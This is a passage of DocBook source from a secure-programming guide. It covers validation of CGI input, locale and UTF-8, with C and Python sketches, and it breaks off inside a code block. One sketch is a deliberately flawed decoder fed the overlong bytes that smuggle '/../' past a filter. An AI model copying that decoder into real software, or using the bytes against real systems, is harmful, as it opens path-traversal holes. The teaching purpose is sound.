In particular, check that values match the set of legal values, and that
buffers are not overflowed.
</para>

</sect1>

<sect1 id="web-apps">
<title>Web-Based Application Inputs (Especially CGI Scripts)</title>

<para>
Web-based applications (such as CGI scripts) run on some trusted
server and must get their
input data somehow through the web.
Since the input data generally come from untrusted users,
this input data must be validated.
Indeed, this information may have actually come from an untrusted third
party; see
<xref linkend="cross-site-malicious-content"> for more information.
For example, CGI scripts
are passed this information
through a standard set of environment variables and through standard input.
The rest of this text will specifically discuss CGI, because it's
the most common technique for implementing dynamic web content, but
the general issues are the same for most other dynamic web content techniques.
</para>

<para>
One additional complication is that many CGI inputs are provided in
so-called ``URL-encoded'' format, that is, some values are written in the
format &percnt;HH where HH is the hexadecimal code for that byte.
You or your CGI library must handle these inputs correctly by
URL-decoding the input and then checking
if the resulting byte value is acceptable.
You must correctly handle all values, including problematic
values such as &percnt;00 (NIL) and &percnt;0A (newline).
Don't decode inputs more than once, or input such as ``&percnt;2500''
will be mishandled (the &percnt;25 would be translated to ``&percnt;'', and the resulting
``&percnt;00'' would be erroneously translated to the NIL character).
</para>
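<para>
The decoding rule above can be sketched in C as follows.
This is only an illustration: the function name url_decode_once() is
hypothetical, it handles only the &percnt;HH form (it does not translate
``+'' to a space, as form-encoded data would also require), and it simply
rejects any input that decodes to a NIL byte.
Checking whether the other decoded bytes (such as newline) are acceptable
is left to the caller.
</para>
<programlisting><![CDATA[
```c
#include <stddef.h>

/* Value of one hexadecimal digit, or -1 if `c` is not a hex digit. */
static int hex_value(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode `in` exactly once into `out`.  Returns the decoded length, or
   -1 if the input is malformed, decodes to a NIL byte, or does not fit. */
long url_decode_once(const char *in, char *out, size_t outsize)
{
    size_t n = 0;

    if (outsize == 0)
        return -1;
    while (*in != '\0') {
        int byte;

        if (*in == '%') {
            int hi = hex_value(in[1]);
            int lo = (hi < 0) ? -1 : hex_value(in[2]);

            if (lo < 0)
                return -1;          /* truncated or non-hex escape */
            byte = hi * 16 + lo;
            in += 3;
        } else {
            byte = (unsigned char)*in;
            in += 1;
        }
        if (byte == 0)
            return -1;              /* reject %00 rather than truncate */
        if (n + 1 >= outsize)
            return -1;              /* leave room for the terminator */
        out[n++] = (char)byte;
    }
    out[n] = '\0';
    return (long)n;
}
```
]]></programlisting>
<para>
Because the output is never fed back through the decoder, an input of
``&percnt;2500'' yields the three characters ``&percnt;00'' and not a NIL byte.
</para>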

<para>
CGI scripts are commonly attacked by including special characters in their
inputs; see the comments above.
</para>

<para>
Another form of data available to web-based applications is ``cookies.''
Again, users can provide arbitrary cookie values, so they cannot
be trusted unless special precautions are taken.
Also, cookies can be used to track users, potentially invading user privacy.
As a result, many users disable cookies, so if possible your web application
should be designed so that it does not require the use of cookies
(but see my later discussion for when you <emphasis>must</emphasis> authenticate
individual users).
I encourage you to avoid or limit the use of persistent cookies
(cookies that last beyond a current session), because they are easily abused.
Indeed, U.S. agencies are currently forbidden to use persistent cookies
except in special circumstances, because of the concern about
invading user privacy; see the
<ulink url="http://cio.gov/files/lewfinal062200.pdf">OMB guidance
in memorandum M-00-13 (June 22, 2000)</ulink>.
<!-- http://cio.gov/files/OMBCookies2.pdf
 http://www.gao.gov/new.items/d01147r.pdf -->
Note that to use cookies, some browsers may insist that you
have a privacy profile (named p3p.xml in the root directory of the server).
</para>

<para>
Some HTML forms include client-side input checking
to prevent some illegal values; these are
typically implemented using Javascript/ECMAscript or Java.
This checking can be helpful for the user, since it can happen ``immediately''
without requiring any network access.
However, this kind of input checking is useless for security, because
attackers can send such ``illegal'' values directly to the web server
without going through the checks.
It's not even hard to subvert this; you don't have to write
a program to send arbitrary data to a web application.
In general, servers must perform all their own input checking
(of form data, cookies, and so on) because
they cannot trust clients to do this securely.
In short, clients are generally not ``trustworthy channels''.
See <xref linkend="trustworthy-channels">
for more information on trustworthy channels.
</para>

<para>
A brief discussion on input validation for those using Microsoft's
Active Server Pages (ASP) is available from
Jerry Connolly at
<ulink url="http://heap.nologin.net/aspsec.html">http://heap.nologin.net/aspsec.html</ulink>.
<!-- ???
Jerry Connolly, jerry.connolly@EIRCOM.NET,
has guidelines for secure ASP pages - mentioned on SECPROG, 1 May 2001:
"I have written a small piece on the subject of input validation at:"
http://heap.nologin.net/aspsec.html
-->
</para>


</sect1>

<sect1 id="other-inputs">
<title>Other Inputs</title>

<para>
Programs must ensure that all inputs are controlled; this is particularly
difficult for setuid/setgid programs because they have so many such inputs.
Other inputs programs must consider include the current directory,
signals, memory maps (mmaps), System V IPC, pending timers,
resource limits, the scheduling priority, and the umask (which determines
the default permissions of newly-created files).
Consider explicitly changing directories (using chdir(2)) to an appropriate,
fully named directory at program startup.
<!--
From Bugtraq:

 Re: trusting user-supplied data (was Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio)
From: wietse@porcupine.org (Wietse Venema)
Date: Wed, 24 Apr 2002 14:17:30 -0400 (EDT)
To: bugtraq@securityfocus.com

It is interesting to see that old problems with set-uid commands
keep coming back. Allow me to speed up the discussion a bit by
enumerating a few other channels for attack on set-uid commands.

A quick perusal of /usr/include/sys/proc.h reveals a large number
of "inputs" that a child process may inherit from a potentially
untrusted parent process.

The list includes, but is not limited to:

    command-line array
    environment array
    open files
    current directory
    blocked/enabled signals
    pending timers
    resource limits
    scheduling priority
All these sources of data can be, and have been, involved in attacks
on set-uid or set-gid commands (although I do not remember specific
details of pending timer attacks).

In addition to these "inheritance" attacks which are specific to
set-uid and set-gid commands, set-uid and set-gid commands can be
exposed to attacks via the /proc interface, and can be exposed to
ordinary data-driven attacks by feeding them nasty inputs.

Thus, set-uid and set-gid commands are exposed to a lot more attack
types than your average network service.  The reason that network
attacks get more attention is simply that are more opportunities
to exploit them.

	Wietse

-->
</para>
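<para>
A few of these inherited settings can be reset with a handful of calls at
startup, as in the sketch below.
The function name reset_process_state() and the choice of a 077 umask are
my own assumptions; the sketch covers only the current directory, the
umask, and a pending alarm(2) timer, and leaves signals, resource limits,
and the other inputs listed above to the reader.
</para>
<programlisting><![CDATA[
```c
#include <stddef.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Reset a few inherited process settings.  `workdir` must be a fully
   named (absolute) directory.  Returns 0 on success, -1 on failure. */
int reset_process_state(const char *workdir)
{
    if (workdir == NULL || workdir[0] != '/')
        return -1;              /* insist on a fully named directory */
    if (chdir(workdir) != 0)
        return -1;
    umask(077);                 /* new files: owner access only */
    alarm(0);                   /* cancel any inherited alarm timer */
    return 0;
}
```
]]></programlisting>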

</sect1>

<sect1 id="locale">
<title>Human Language (Locale) Selection</title>

<para>
As more people have computers and the Internet available to them, there
has been increasing pressure for programs
to support multiple human languages and cultures.
This combination of language and other cultural factors is usually called
a ``locale''.
The process of modifying a program so it can support multiple locales
is called ``internationalization'' (i18n), and the process of providing
the information for a particular locale to a program is called
``localization'' (l10n).
</para>

<para>
Overall, internationalization
is a good thing, but this process provides another opportunity
for a security exploit.
Since a potentially untrusted user provides information on the desired
locale, locale selection becomes another input that,
if not properly protected, can be exploited.
</para>

<sect2 id="how-locales-selected">
<title>How Locales are Selected</title>

<para>
In locally-run programs (including setuid/setgid programs),
locale information is provided by an environment
variable.
Thus, like all other environment variables, these values
must be extracted and checked against valid patterns before use.
</para>

<para>
For web applications, this information can be obtained from the web
browser (via the Accept-Language request header).
However, since not all web browsers properly pass this information
(and not all users configure their browsers properly),
this is used less often than you might think.
Often, the language requested in a web browser
is simply passed in as a form value.
Again, these values must be checked for validity before use, as with
any other form value.
</para>

<para>
In either case, locale information is
really just a special case of input discussed in the previous sections.
However, because this input is so rarely considered,
I'm discussing it separately.
In particular,
when combined with format strings (discussed later), user-controlled
strings can permit attackers to force other programs to run
arbitrary instructions,
corrupt data, and do other unfortunate actions.
</para>

</sect2>

<sect2 id="locale-support-mechanisms">
<title>Locale Support Mechanisms</title>

<para>
There are two major library interfaces for supporting locale-selected
messages on Unix-like systems,
one called ``catgets'' and the other called ``gettext''.
In the catgets approach, every string is assigned a unique number, which
is used as an index into a table of messages.
In contrast,
in the gettext approach, a string (usually in English) is used as the key to
look up its translation in a table.
catgets(3) is an accepted standard
(via the X/Open Portability Guide, Volume 3 and
Single Unix Specification),
<!-- http://www.opengroup.org/onlinepubs/007908799/xsh/catopen.html -->
so it's possible your program uses it.
The ``gettext'' interface is not an official standard
(though it was originally a UniForum proposal), but I believe it's the
more widely used interface
(it's used by Sun and essentially all GNU programs).
</para>

<para>
In theory, catgets should be slightly faster, but this is at best
marginal on today's machines, and the bookkeeping effort to keep
unique identifiers valid in catgets() makes the gettext() interface
much easier to use.
I'd suggest using gettext(), just because it's easier to use.
However, don't take my word for it; see GNU's documentation on gettext
(info:gettext#catgets) for a longer and more descriptive comparison.
</para>

<para>
The catgets(3) call (and its associated catopen(3) call)
in particular is vulnerable
to security problems, because the environment variable NLSPATH can be
used to control the filenames used to acquire internationalized messages.
The GNU C library ignores NLSPATH for setuid/setgid programs, which helps,
but that doesn't protect programs running on other implementations, nor
other programs (like CGI scripts) which don't ``appear'' to
require such protection.
</para>

<para>
The widely-used ``gettext'' interface is at least not
vulnerable to a malicious NLSPATH setting to my knowledge.
However, it appears likely to me that malicious settings of
LC_ALL or LC_MESSAGES could cause problems.
Also, if you use gettext's bindtextdomain() routine in its file cat-compat.c,
that does depend on NLSPATH.
</para>
</sect2>

<sect2 id="locale-legal-values">
<title>Legal Values</title>

<para>
For the moment, if you must permit untrusted users to set information on
their desired locales, make sure the provided internationalization information
meets a narrow filter that only permits legitimate locale names.
For user programs (especially setuid/setgid programs), these values
will come in via NLSPATH, LANGUAGE, LANG, the old LINGUAS, LC_ALL, and
the other LC_* values (especially LC_MESSAGES, but also including
LC_COLLATE, LC_CTYPE, LC_MONETARY, LC_NUMERIC, and LC_TIME).
For web applications, this user-requested set of language information
would be done via the Accept-Language request header or a form value
(the application should indicate the actual language setting of the
data being returned via the Content-Language header).
You can check this value as part of your environment variable filtering if
your users can set your environment variables (i.e., setuid/setgid
programs) or as part of your input filtering (e.g., for CGI scripts).
The GNU C library "glibc" doesn't accept some values of LANG for
setuid/setgid programs (in particular anything with "/"),
but errors have been found in that filtering
(e.g., Red Hat released an update to fix this error in glibc
on September 1, 2000).
This kind of filtering isn't required by any standard, so you're
safer doing this filtering yourself.
I have not found any guidance on filtering language settings,
so here are my suggestions based on my own research into the issue.
</para>

<para>
First, a few words about the legal values of these settings.
Language settings are generally set using the standard tags defined
in IETF RFC 1766 (which uses two-letter language codes as its basic tag,
followed by an optional subtag separated by a dash; I've found that
environment variable settings use the underscore instead).
However, some find this insufficiently flexible, so three-letter language
codes may soon be used as well.
Also, there are two major not-quite compatible extended formats, the
X/Open Format and the CEN Format (European Community Standard);
you'd like to permit both.
Typical values include
``C'' (the C locale), ``en'' (English),
and ``fr_FR'' (French using the territory of France's conventions).
Also, so many people use nonstandard names that programs have had to develop
``alias'' systems to cope with nonstandard names
(for GNU gettext, see /usr/share/locale/locale.alias, and for X11, see
/usr/lib/X11/locale/locale.alias; you might need "aliases" instead of "alias");
they should usually be permitted as well.
Libraries like gettext() have to accept all these variants and find an
appropriate value, where possible.
One source of further information is FSF [1999];
another source is the li18nux.org web site.
A filter should not permit characters that aren't needed,
in particular ``/'' (which might permit escaping out of the trusted
directories) and ``..'' (which might permit going up one directory).
Other dangerous characters in NLSPATH
include ``%'' (which indicates substitution) and ``:''
(which is the directory separator); the documentation I have for other
machines suggests that some implementations may use them for other values,
so it's safest to prohibit them.
<!-- The Sun man page for "man locale" is disturbingly ambiguous on whether
     or not these characters affect values other than NLSPATH -->
</para>
</sect2>

<sect2 id="locale-bottom-line">
<title>Bottom Line</title>

<para>
In short, I suggest
simply erasing or re-setting the NLSPATH, unless you have a trusted user
supplying the value.
For the Accept-Language header in HTTP (if you use it),
form values specifying the locale, and the environment variables
LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_* values listed
above,
filter the locales from untrusted users to permit null (empty) values or
to only permit values that match in total this regular expression
(note that I've recently added "="):
<programlisting width="61">
 [A-Za-z][A-Za-z0-9_,+@\-\.=]*
</programlisting>
<!-- I permit plus. Standard locale name from li18nux.org
     permits "=", so I added it; as of Feb 2002 they don't accept "+",
     which is needed to support the CEN format. -->
I haven't found any legitimate locale which doesn't match this pattern,
and this pattern does appear to protect against locale attacks.
Of course, there's no guarantee that there are messages available
in the requested locale,
but in such a case these routines will fall back to the default
messages (usually in English), which at least is not a security problem.
<!-- I developed this pattern, after looking at the GLIBC specs in
     http://www.netppl.fi/~pp/glibc21/libc_8.html and the aliases on
     Red Hat 6.2 -->
</para>

<para>
If you wish to be really picky, and only accept values that match li18nux's
locale pattern, you can use this pattern instead:
<programlisting width="61">
 ^[A-Za-z]+(_[A-Za-z]+)?
 (\.[A-Z]+(\-[A-Z0-9]+)*)?
 (\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
  (,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$
</programlisting>
In both cases, these patterns use POSIX's extended (``modern'')
regular expression notation (see regex(3) and regex(7) on Unix-like systems).
</para>
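<para>
Here is a minimal sketch of applying the first (more permissive) filter
with the POSIX regcomp(3) and regexec(3) routines.
The function name locale_value_ok() is hypothetical.
I've assumed the intent of the pattern is to permit a literal hyphen, so
the bracket expression is written with the hyphen last and without
backslashes, because POSIX bracket expressions treat a backslash as an
ordinary character rather than as an escape.
The sketch also assumes the program is running in the default ``C'' locale,
so that ranges such as A-Z mean what they appear to mean.
</para>
<programlisting><![CDATA[
```c
#include <regex.h>
#include <stddef.h>

/* Return 1 if `value` is empty or looks like a plausible locale name,
   0 if it should be rejected, -1 if the pattern failed to compile. */
int locale_value_ok(const char *value)
{
    /* Anchored at both ends so the whole value must match. */
    static const char pattern[] = "^[A-Za-z][A-Za-z0-9_,+@.=-]*$";
    regex_t re;
    int rc;

    if (value[0] == '\0')
        return 1;               /* null (empty) values are permitted */
    if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0)
        return -1;
    rc = regexec(&re, value, 0, NULL, 0);
    regfree(&re);
    return rc == 0 ? 1 : 0;
}
```
]]></programlisting>
<para>
A program would apply a check like this to each of LANGUAGE, LANG, LC_ALL,
and the other LC_* values it intends to keep, and drop any variable whose
value fails.
</para>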

<!-- See John Levon's Bugtraq post on July 26, 2000 re internationalization
     and format strings.
-->

<para>
Of course, languages cannot be supported without a
standard way to represent their written symbols, which brings
us to the issue of character encoding.
</para>

</sect2>

</sect1>

<sect1 id="character-encoding">
<title>Character Encoding</title>

<sect2 id="character-encoding-intro">
<title>Introduction to Character Encoding</title>

<para>
For many years Americans have exchanged text using the ASCII character set;
since essentially all U.S. systems support ASCII,
this permits easy exchange of English text.
Unfortunately, ASCII is completely inadequate in handling the characters
of nearly all other languages.
For many years different countries have adopted different techniques for
exchanging text in different languages, making it difficult to exchange
data in an increasingly interconnected world.
</para>

<para>
More recently, ISO has developed ISO 10646,
the ``Universal Multiple-Octet Coded Character Set'' (UCS).
UCS is a coded character set which
defines a single 31-bit value for each of the world's characters.
The first 65536 characters of the UCS (which thus fit into 16 bits)
are termed the ``Basic Multilingual Plane'' (BMP),
and the BMP is intended to cover nearly all of today's spoken languages.
The Unicode Consortium develops the Unicode standard, which concentrates on
the UCS and adds some additional conventions to aid interoperability.
Historically, Unicode and ISO 10646 were developed by competing groups,
but thankfully they realized that they needed to work together and they now
coordinate with each other.
</para>

<para>
If you're writing new software that handles internationalized characters,
you should be using ISO 10646/Unicode as your basis for handling
international characters.
However, you may need to process older documents in various older
(language-specific) character sets, in which case, you need to ensure that
an untrusted user cannot control the setting of another document's
character set (since this would significantly affect the document's
interpretation).
</para>
</sect2>

<sect2 id="character-encoding-utf8">
<title>Introduction to UTF-8</title>

<para>
Most software is not designed to handle 16 bit or 32 bit characters,
yet to create a universal character set more than 8 bits was required.
Therefore, a special format called ``UTF-8'' was developed to encode these
potentially international
characters in a format more easily handled by existing programs and libraries.
UTF-8 is defined, among other places, in IETF RFC 2279, so it's a
well-defined standard that can be freely read and used.
UTF-8 is a variable-width encoding; characters numbered 0 to 0x7f (127)
encode to themselves as a single byte,
while characters with larger values are encoded into 2 to 6 bytes of
information (depending on their value).
The encoding has been specially designed to have the following
nice properties (this information is from the RFC and Linux utf-8 man page):

<itemizedlist>
<listitem><para>
       The classical US ASCII characters (0 to 0x7f) encode as themselves,
       so files  and strings  which  contain only 7-bit ASCII characters
       have the same encoding under both ASCII and UTF-8.
       This is fabulous for backward compatibility with the many existing
       U.S. programs and data files.
</para></listitem>

<listitem><para>
       All UCS characters beyond 0x7f are  encoded  as  a  multibyte
       sequence  consisting  only of bytes in the range 0x80 to 0xfd.
       This means that no ASCII byte can appear  as  part  of  another
       character.  Many other encodings permit characters such as an
       embedded NUL (zero) byte, causing programs to fail.
</para></listitem>

<listitem><para>
       It's easy to convert between UTF-8 and a 2-byte or 4-byte
       fixed-width representations of characters (these are called
       UCS-2 and UCS-4 respectively).
</para></listitem>

<listitem><para>
       The lexicographic sorting order of UCS-4 strings is preserved,
       and the Boyer-Moore fast search algorithm can be used directly
       with UTF-8 data.
</para></listitem>

<listitem><para>
       All  possible 2^31 UCS codes can be encoded using UTF-8.
</para></listitem>

<listitem><para>
       The  first byte of a multibyte sequence which represents
       a single non-ASCII UCS character is always in the  range
       0xc0  to  0xfd  and  indicates  how  long this multibyte
       sequence is. All further bytes in a  multibyte  sequence
       are  in  the range 0x80 to 0xbf. This allows easy resynchronization;
       if a byte is missing, it's easy to skip forward to the ``next''
       character, and it's always easy to skip forward and back to the
       ``next'' or ``preceding'' character.
</para></listitem>

</itemizedlist>
</para>
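<para>
Several of the properties listed above can be observed directly.
The following is only a minimal sketch in Python, using the language's
built-in UTF-8 codec; the sample characters and variable names are
arbitrary choices made for illustration.
<programlisting>
<![CDATA[
```python
# Illustrative only: inspect how Python's built-in UTF-8 codec encodes text.
samples = ["A", "\u00e9", "\u20ac", "\U00010348"]  # 1, 2, 3 and 4 byte cases
encoded = [s.encode("utf-8") for s in samples]
lengths = [len(b) for b in encoded]

# Pure ASCII text is byte-for-byte identical under ASCII and UTF-8.
ascii_same = "plain text".encode("ascii") == "plain text".encode("utf-8")

# Every byte of a multibyte sequence has its high bit set, so no ASCII
# byte (such as "/" or NUL) can hide inside another character.
high_bits_only = all(b >= 0x80 for seq in encoded[1:] for b in seq)


def is_continuation(byte):
    """Continuation bytes are always in the range 0x80 to 0xBF."""
    return 0x80 <= byte <= 0xBF


# Sorting the encoded byte strings gives the same order as sorting the
# characters by their code values.
words = ["z", "\u00e9", "a", "\u20ac", "\U00010348"]
by_bytes = [b.decode("utf-8") for b in sorted(w.encode("utf-8") for w in words)]
same_order = sorted(words) == by_bytes
```
]]>
</programlisting>
Because a continuation byte can always be told apart from a leading byte,
a program that lands in the middle of a character can step backward or
forward until <literal>is_continuation()</literal> is false and resume there.
</para>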


<para>
In short, the UTF-8 transformation format is becoming a dominant method
for exchanging international text information because it can support all of the
world's languages, yet it is backward compatible with U.S. ASCII files
as well as having other nice properties.
For many purposes I recommend its use, particularly when storing data
in a ``text'' file.
</para>
</sect2>

<sect2 id="utf8-security-issues">
<title>UTF-8 Security Issues</title>


<para>
The reason to mention UTF-8 is that
some byte sequences are not legal UTF-8, and
this might be an exploitable security hole.
UTF-8 encoders are supposed to use the ``shortest possible''
encoding, but naive decoders may accept encodings that are longer than
necessary.
Indeed, earlier standards permitted decoders to accept
``non-shortest form'' encodings.
The problem here is that this means that potentially dangerous
input could be represented multiple ways, and thus might
defeat the security routines checking for dangerous inputs.
The RFC describes the problem this way:

<blockquote>
<para>
Implementers of UTF-8 need to consider the security aspects of how
they handle illegal UTF-8 sequences.  It is conceivable that in some
circumstances an attacker would be able to exploit an incautious
UTF-8 parser by sending it an octet sequence that is not permitted by
the UTF-8 syntax.
</para>

<para>
A particularly subtle form of this attack could be carried out
against a parser which performs security-critical validity checks
against the UTF-8 encoded form of its input, but interprets certain
illegal octet sequences as characters.  For example, a parser might
prohibit the NUL character when encoded as the single-octet sequence
00, but allow the illegal two-octet sequence C0 80 (illegal because
it's longer than necessary) and interpret it
as a NUL character (00).  Another example might be a parser which
prohibits the octet sequence 2F 2E 2E 2F ("/../"), yet permits the
illegal octet sequence 2F C0 AE 2E 2F.
</para>
</blockquote>

</para>
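<para>
To make the RFC's second example concrete, here is a small sketch in Python.
The function <literal>naive_decode()</literal> is a hypothetical,
deliberately incautious decoder written only for this illustration;
it is contrasted with Python's built-in strict UTF-8 decoder.
<programlisting>
<![CDATA[
```python
def naive_decode(data):
    """Deliberately incautious decoder: handles 1- and 2-byte forms only
    and never checks for overlong encodings. Do NOT use this in real code."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data):
            # Blindly combine the payload bits of the two bytes.
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError("byte not handled by this sketch")
    return "".join(out)


attack = bytes([0x2F, 0xC0, 0xAE, 0x2E, 0x2F])  # the RFC's example octets

# A check made against the encoded form does not see "/../" ...
passes_byte_filter = b"/../" not in attack
# ... but the incautious decoder turns C0 AE into "." anyway.
naive_result = naive_decode(attack)

# A strict decoder refuses the illegal sequence instead.
try:
    attack.decode("utf-8")
    strict_rejects = False
except UnicodeDecodeError:
    strict_rejects = True
```
]]>
</programlisting>
The byte-level filter is satisfied, yet the naive decoder produces
the forbidden string; the strict decoder raises an error, which is the
behavior you want before any other checks are applied.
</para>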

<para>
A longer discussion about this is available at
Markus Kuhn's
<emphasis remap="it">UTF-8 and Unicode FAQ for Unix/Linux</emphasis> at
<ulink
url="http://www.cl.cam.ac.uk/~mgk25/unicode.html">http://www.cl.cam.ac.uk/~mgk25/unicode.html</ulink>.
</para>
</sect2>

<sect2 id="utf8-legal-values">
<title>UTF-8 Legal Values</title>

<para>
Thus, when accepting UTF-8 input, you need to check if the input is
valid UTF-8.
Here is a list of all legal UTF-8 sequences; any character
sequence not matching this table is not a legal UTF-8 sequence.
In the following table, the first column shows the various character
values being encoded into UTF-8.
The second column shows how those characters are encoded as binary values;
an ``x'' indicates where the data is placed (either a 0 or 1), though
some values should not be allowed because they're not the shortest possible
encoding.
The last column shows the valid values each byte can have
(in hexadecimal).
Thus, a program should check that every character meets one of the patterns
in the right-hand column.
A ``-'' indicates a range of legal values (inclusive).
Of course, just because a sequence is a legal UTF-8 sequence doesn't
mean that you should accept it (you still need to do all your other
checking), but generally you should check any UTF-8 data for UTF-8 legality
before performing other checks.
<table>
<title>Legal UTF-8 Sequences</title>
<tgroup cols="3">
<colspec colname="UCS">
<colspec colname="binary-range">
<colspec colname="hex">
<thead>
<row><entry>UCS Code (Hex)</entry><entry>Binary UTF-8 Format</entry><entry>Legal UTF-8 Values (Hex)</entry></row>
</thead>
<tbody>
<row><entry>00-7F</entry><entry>0xxxxxxx</entry><entry>00-7F</entry></row>
<row><entry>80-7FF</entry><entry>110xxxxx 10xxxxxx</entry><entry>C2-DF 80-BF</entry></row>
<row><entry>800-FFF</entry><entry>1110xxxx 10xxxxxx 10xxxxxx</entry><entry>E0 A0*-BF 80-BF</entry></row>
<row><entry>1000-FFFF</entry><entry>1110xxxx 10xxxxxx 10xxxxxx</entry><entry>E1-EF 80-BF 80-BF</entry></row>
<row><entry>10000-3FFFF</entry> <entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F0 90*-BF 80-BF 80-BF</entry></row>
<row><entry>40000-FFFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F1-F3 80-BF 80-BF 80-BF</entry></row>
<row><entry>100000-10FFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F4 80-8F* 80-BF 80-BF</entry></row>
<row><entry>200000-3FFFFFF</entry><entry>111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>too large; see below</entry></row>
<row><entry>4000000-7FFFFFFF</entry><entry>1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>too large; see below</entry></row>
</tbody>
</tgroup>
</table>
</para>
<!-- From: http://www.unicode.org/unicode/uni2errata/UTF-8_Corrigendum.html -->

<para>
As I noted earlier, there are two standards for character sets,
ISO 10646 and Unicode, which have agreed to synchronize their
character assignments.
The definition of UTF-8 in ISO/IEC 10646-1:2000 and the IETF RFC
also currently support
five and six byte sequences to encode characters outside the range
supported by the Unicode Consortium's Unicode standard, but such values can't be used to
support Unicode characters and it's expected that a future version of
ISO 10646 will have the same limits.
<!--  http://www.unicode.org/unicode/reports/tr27/#relation -->
Thus, for most purposes the five and six byte UTF-8 encodings aren't legal,
and you should normally reject them (unless you have a special purpose
for them).
</para>

<para>
This set of valid values is tricky to determine, and in fact
earlier versions of this document got some entries
wrong (in some cases it permitted overlong characters).
Language developers should include a function in their libraries
to check for valid UTF-8 values, just because it's so hard to get right.
</para>
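<para>
As an illustration of such a checking function, here is a minimal sketch
in Python that transcribes the ``Legal UTF-8 Sequences'' table row by row.
The names <literal>LEGAL_PATTERNS</literal>,
<literal>match_length()</literal>, and <literal>is_legal_utf8()</literal>
are invented for this example.
Like the table, it does not single out the byte sequences ED A0-BF 80-BF
(the UTF-16 surrogate values), which later revisions of the UTF-8
definition also forbid; treat that as an additional check you may need.
<programlisting>
<![CDATA[
```python
# Each entry lists the allowed (low, high) range for every byte of one
# legal form, copied from the "Legal UTF-8 Sequences" table. Five- and
# six-byte forms are rejected simply because they are not listed.
LEGAL_PATTERNS = [
    ((0x00, 0x7F),),
    ((0xC2, 0xDF), (0x80, 0xBF)),
    ((0xE0, 0xE0), (0xA0, 0xBF), (0x80, 0xBF)),
    ((0xE1, 0xEF), (0x80, 0xBF), (0x80, 0xBF)),
    ((0xF0, 0xF0), (0x90, 0xBF), (0x80, 0xBF), (0x80, 0xBF)),
    ((0xF1, 0xF3), (0x80, 0xBF), (0x80, 0xBF), (0x80, 0xBF)),
    ((0xF4, 0xF4), (0x80, 0x8F), (0x80, 0xBF), (0x80, 0xBF)),
]


def match_length(data, pos):
    """Return the length of the legal sequence starting at pos, or 0."""
    for pattern in LEGAL_PATTERNS:
        chunk = data[pos:pos + len(pattern)]
        if len(chunk) == len(pattern) and all(
            low <= byte <= high for byte, (low, high) in zip(chunk, pattern)
        ):
            return len(pattern)
    return 0


def is_legal_utf8(data):
    """True if every byte of data belongs to a sequence in the table."""
    pos = 0
    while pos < len(data):
        step = match_length(data, pos)
        if step == 0:
            return False
        pos += step
    return True
```
]]>
</programlisting>
In practice it is usually wiser to rely on a well-tested library decoder
run in its strict mode than on a hand-written routine like this one.
</para>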

<para>
I should note that in some cases, you might want to tolerate (or use
internally) the hexadecimal sequence C0 80.  This is an overlong sequence
that, if permitted, can represent ASCII NUL (NIL).  Since C and C++
have trouble including a NIL character in an ordinary string,
some people have taken
to using this sequence when they want to represent NIL as part of the
data stream; Java even enshrines the practice.
Feel free to use C0 80 internally while processing data, but technically
you really should translate this back to 00 before saving the data.
Depending on your needs, you might decide to be ``sloppy'' and accept
C0 80 as input in a UTF-8 data stream.
If it doesn't harm security, it's probably a good practice to accept this
sequence since accepting it aids interoperability.
</para>
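<para>
The translation described above can be sketched in a few lines of Python.
The function names are hypothetical; the sketch relies on the fact that
the byte C0 never occurs in legal UTF-8, so replacing the pair C0 80
cannot damage any other legal character.
<programlisting>
<![CDATA[
```python
OVERLONG_NUL = b"\xc0\x80"


def to_internal(data):
    """Hide real NUL bytes so C-style string handling is not cut short."""
    return data.replace(b"\x00", OVERLONG_NUL)


def to_external(data):
    """Translate the internal C0 80 form back to a plain 00 before saving."""
    return data.replace(OVERLONG_NUL, b"\x00")
```
]]>
</programlisting>
After calling <literal>to_external()</literal> the result should still be
run through a strict UTF-8 check, since this translation forgives only
the one overlong sequence.
</para>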

<para>
Handling this can be tricky.
You might want to examine the C routines developed by Unicode to
handle conversions, available at
<ulink url="ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c">
ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c</ulink>.
It's unclear to me if these routines are open source software (the
licenses don't clearly say whether or not they can be modified), so
beware of that.
</para>

</sect2>


<sect2 id="utf8-related-issues">
<title>UTF-8 Related Issues</title>

<para>
This section has discussed UTF-8, because it's the most popular
multibyte encoding of UCS, simplifying a lot of international text
handling issues.
However, it's certainly not the only encoding; there are other encodings,
such as UTF-16 and UTF-7, which have the same kinds of issues and
must be validated for the same reasons.
</para>

<para>
Another issue is that some phrases can be expressed in more than one
way in ISO 10646/Unicode.
For example, some accented characters can be represented as a single
character (with the accent) and also as a set of characters
(e.g., the base character plus a separate composing accent).
These two forms may appear identical.
There's also a zero-width space that could be inserted, with the
result that apparently-similar items are considered different.
Beware of situations where such hidden text could interfere with the program.
This is an issue that in general is hard to solve; most programs don't
have such tight control over the clients that they know completely how
a particular sequence will be displayed (since this depends on the
client's font, display characteristics, locale, and so on).
</para>
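<para>
The following Python sketch shows the two effects just described, using
the standard <literal>unicodedata</literal> module.
The choice of normalization form (NFC) and the decision to strip only the
zero-width space (U+200B) are assumptions made for this example; a real
application may need a different form or a longer list of invisible
characters, and none of this settles how a client will display the text.
<programlisting>
<![CDATA[
```python
import unicodedata

precomposed = "caf\u00e9"   # e with acute accent as a single character
decomposed = "cafe\u0301"   # plain e followed by a combining accent
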